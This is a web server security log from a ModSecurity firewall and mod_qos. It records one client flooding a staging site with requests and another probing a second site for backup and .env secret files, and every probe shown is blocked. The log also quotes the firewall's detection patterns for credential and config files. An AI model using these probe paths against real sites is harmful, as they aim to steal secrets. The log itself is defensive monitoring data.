[Tue May 26 19:53:50.321474 2026] [security2:error] [pid 93576:tid 93811] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLbgAAAGM"]
[Tue May 26 19:53:50.325440 2026] [security2:error] [pid 93576:tid 93765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLeQAAADU"]
[Tue May 26 19:53:50.328325 2026] [security2:error] [pid 93867:tid 94025] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9JCDfrjqoHpuuBKrSgAAARU"]
[Tue May 26 19:53:50.351653 2026] [security2:error] [pid 93576:tid 93790] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLbwAAAE4"]
[Tue May 26 19:53:50.364093 2026] [security2:error] [pid 93576:tid 93744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLfQAAACA"]
[Tue May 26 19:53:50.368371 2026] [security2:error] [pid 93576:tid 93747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9WDRMqfxdEDkoszLmQAAACM"]
[Tue May 26 19:53:50.374898 2026] [security2:error] [pid 93576:tid 93786] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLfAAAAEo"]
[Tue May 26 19:53:50.388986 2026] [security2:error] [pid 93867:tid 94206] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9JCDfrjqoHpuuBKrWwAAAXU"]
[Tue May 26 19:53:50.393547 2026] [security2:error] [pid 93867:tid 94106] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKragAAAUg"]
[Tue May 26 19:53:50.396152 2026] [security2:error] [pid 93867:tid 94142] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKrZQAAAVk"]
[Tue May 26 19:53:50.400532 2026] [security2:error] [pid 93867:tid 94020] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKrbAAAARA"]
[Tue May 26 19:53:50.417112 2026] [security2:error] [pid 93867:tid 94124] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKrfwAAAVE"]
[Tue May 26 19:53:50.421705 2026] [security2:error] [pid 93867:tid 94029] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKrZgAAARk"]
[Tue May 26 19:53:50.433096 2026] [security2:error] [pid 93867:tid 94015] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKrZAAAAQs"]
[Tue May 26 19:53:50.434914 2026] [security2:error] [pid 93867:tid 94181] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKreQAAAWo"]
[Tue May 26 19:53:50.437586 2026] [security2:error] [pid 93867:tid 94087] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKrewAAAT8"]
[Tue May 26 19:53:50.437979 2026] [security2:error] [pid 93867:tid 94241] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKrfAAAAYY"]
[Tue May 26 19:53:50.439371 2026] [security2:error] [pid 93867:tid 94077] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKreAAAATo"]
[Tue May 26 19:53:50.451569 2026] [security2:error] [pid 93867:tid 94036] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKrdwAAASA"]
[Tue May 26 19:53:50.454821 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9WDRMqfxdEDkoszLmAAAAEI"]
[Tue May 26 19:53:50.460972 2026] [security2:error] [pid 93867:tid 94046] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKrawAAASo"]
[Tue May 26 19:53:50.469613 2026] [security2:error] [pid 86490:tid 86675] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/config/settings.bak"] [unique_id "ahWs9lZMwN0DpLVWo6Ku8wAAALw"]
[Tue May 26 19:53:50.569758 2026] [qos:error] [pid 93576:tid 93779] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9mDRMqfxdEDkoszLtgAAAEM
[Tue May 26 19:53:50.570784 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KvGQAAAM4
[Tue May 26 19:53:50.685281 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9mDRMqfxdEDkoszLtwAAAHE
[Tue May 26 19:53:50.688659 2026] [qos:error] [pid 86490:tid 86650] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KvHgAAAKM
[Tue May 26 19:53:50.689289 2026] [qos:error] [pid 86490:tid 86657] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KvIAAAAKo
[Tue May 26 19:53:50.690911 2026] [qos:error] [pid 86490:tid 86627] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KvIQAAAIw
[Tue May 26 19:53:50.701807 2026] [qos:error] [pid 93576:tid 93836] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9mDRMqfxdEDkoszLuAAAAHw
[Tue May 26 19:53:50.704475 2026] [qos:error] [pid 86490:tid 86651] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KvIgAAAKQ
[Tue May 26 19:53:50.705768 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KvJAAAAOg
[Tue May 26 19:53:50.708448 2026] [qos:error] [pid 86490:tid 86668] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KvJQAAALU
[Tue May 26 19:53:50.808314 2026] [security2:error] [pid 86490:tid 86702] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/src/assembly/.env"] [unique_id "ahWs9lZMwN0DpLVWo6KvJwAAANc"]
[Tue May 26 19:53:50.933112 2026] [qos:error] [pid 93576:tid 93817] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9mDRMqfxdEDkoszLuQAAAGk
[Tue May 26 19:53:50.934116 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9mDRMqfxdEDkoszLugAAACE
[Tue May 26 19:53:50.939729 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KvKgAAAM4
[Tue May 26 19:53:50.941178 2026] [qos:error] [pid 86490:tid 86720] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KvKwAAAOk
[Tue May 26 19:53:50.942461 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs9mDRMqfxdEDkoszLuwAAACw
[Tue May 26 19:53:50.942460 2026] [qos:error] [pid 86490:tid 86721] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KvLAAAAOo
[Tue May 26 19:53:50.944197 2026] [qos:error] [pid 86490:tid 86715] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KvLQAAAOQ
[Tue May 26 19:53:50.945497 2026] [qos:error] [pid 86490:tid 86709] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KvLgAAAN4
[Tue May 26 19:53:50.946070 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KvLwAAAME
[Tue May 26 19:53:50.946426 2026] [qos:error] [pid 86490:tid 86670] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KvMAAAALc
[Tue May 26 19:53:51.081909 2026] [qos:error] [pid 93576:tid 93718] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs92DRMqfxdEDkoszLvAAAAAY
[Tue May 26 19:53:51.082567 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs92DRMqfxdEDkoszLvQAAABY
[Tue May 26 19:53:51.092670 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvMwAAAPs
[Tue May 26 19:53:51.093048 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs92DRMqfxdEDkoszLvgAAABM
[Tue May 26 19:53:51.094023 2026] [qos:error] [pid 86490:tid 86702] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvNAAAANc
[Tue May 26 19:53:51.095273 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvNQAAAOc
[Tue May 26 19:53:51.097495 2026] [qos:error] [pid 86490:tid 86694] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvNgAAAM8
[Tue May 26 19:53:51.101064 2026] [qos:error] [pid 86490:tid 86647] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvNwAAAKA
[Tue May 26 19:53:51.108174 2026] [qos:error] [pid 86490:tid 86676] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvOAAAAL0
[Tue May 26 19:53:51.110242 2026] [qos:error] [pid 86490:tid 86653] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs91ZMwN0DpLVWo6KvOQAAAKY
[Tue May 26 19:53:51.143039 2026] [security2:error] [pid 93868:tid 94330] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/keys/sample.bak"] [unique_id "ahWs90qK9k_ZUB2Vp25EvgAAAdc"]
[Tue May 26 19:53:51.279074 2026] [security2:error] [pid 86490:tid 86713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9VZMwN0DpLVWo6KulAAAAOI"]
[Tue May 26 19:53:51.279691 2026] [security2:error] [pid 93867:tid 94089] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKrgwAAAUA"]
[Tue May 26 19:53:51.279786 2026] [security2:error] [pid 93867:tid 94057] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKregAAATE"]
[Tue May 26 19:53:51.279952 2026] [security2:error] [pid 93867:tid 94192] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKraQAAAW8"]
[Tue May 26 19:53:51.280851 2026] [security2:error] [pid 93576:tid 93767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9WDRMqfxdEDkoszLmgAAADc"]
[Tue May 26 19:53:51.286571 2026] [security2:error] [pid 93868:tid 94282] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9UqK9k_ZUB2Vp25EowAAAac"]
[Tue May 26 19:53:51.304660 2026] [security2:error] [pid 93867:tid 94019] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKrfgAAAQ8"]
[Tue May 26 19:53:51.307967 2026] [security2:error] [pid 86490:tid 86674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9VZMwN0DpLVWo6KulQAAALs"]
[Tue May 26 19:53:51.315169 2026] [security2:error] [pid 86490:tid 86714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9VZMwN0DpLVWo6KulwAAAOM"]
[Tue May 26 19:53:51.320110 2026] [security2:error] [pid 93868:tid 94265] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9UqK9k_ZUB2Vp25EpAAAAZY"]
[Tue May 26 19:53:51.325733 2026] [security2:error] [pid 93867:tid 94031] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKrhAAAARs"]
[Tue May 26 19:53:51.332426 2026] [security2:error] [pid 86490:tid 86717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9VZMwN0DpLVWo6KunAAAAOY"]
[Tue May 26 19:53:51.335891 2026] [security2:error] [pid 93868:tid 94350] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/staging/.env.bak"] [unique_id "ahWs90qK9k_ZUB2Vp25EwQAAAes"]
[Tue May 26 19:53:51.347511 2026] [security2:error] [pid 86490:tid 86700] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9VZMwN0DpLVWo6KungAAANU"]
[Tue May 26 19:53:51.355258 2026] [security2:error] [pid 86490:tid 86636] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9lZMwN0DpLVWo6Ku4QAAAJU"]
[Tue May 26 19:53:51.358399 2026] [security2:error] [pid 86490:tid 86691] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9VZMwN0DpLVWo6KumQAAAMw"]
[Tue May 26 19:53:51.368797 2026] [security2:error] [pid 93867:tid 94128] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9ZCDfrjqoHpuuBKrhQAAAVM"]
[Tue May 26 19:53:51.374753 2026] [security2:error] [pid 86490:tid 86708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9VZMwN0DpLVWo6KumAAAAN0"]
[Tue May 26 19:53:51.376028 2026] [security2:error] [pid 86490:tid 86669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9lZMwN0DpLVWo6Ku9AAAALY"]
[Tue May 26 19:53:51.390021 2026] [security2:error] [pid 86490:tid 86695] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9lZMwN0DpLVWo6Ku6QAAANA"]
[Tue May 26 19:53:51.394421 2026] [security2:error] [pid 93868:tid 94342] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9kqK9k_ZUB2Vp25EtAAAAeM"]
[Tue May 26 19:53:51.396932 2026] [security2:error] [pid 93867:tid 94075] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9pCDfrjqoHpuuBKrkAAAATk"]
[Tue May 26 19:53:51.399786 2026] [security2:error] [pid 93868:tid 94341] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9kqK9k_ZUB2Vp25ErgAAAeI"]
[Tue May 26 19:53:51.412405 2026] [security2:error] [pid 93867:tid 94135] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9pCDfrjqoHpuuBKrjQAAAVY"]
[Tue May 26 19:53:51.417540 2026] [security2:error] [pid 93868:tid 94292] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9kqK9k_ZUB2Vp25EqAAAAbE"]
[Tue May 26 19:53:51.419662 2026] [security2:error] [pid 93868:tid 94332] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9kqK9k_ZUB2Vp25ErAAAAdk"]
[Tue May 26 19:53:51.427037 2026] [security2:error] [pid 93868:tid 94344] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9kqK9k_ZUB2Vp25EsgAAAeU"]
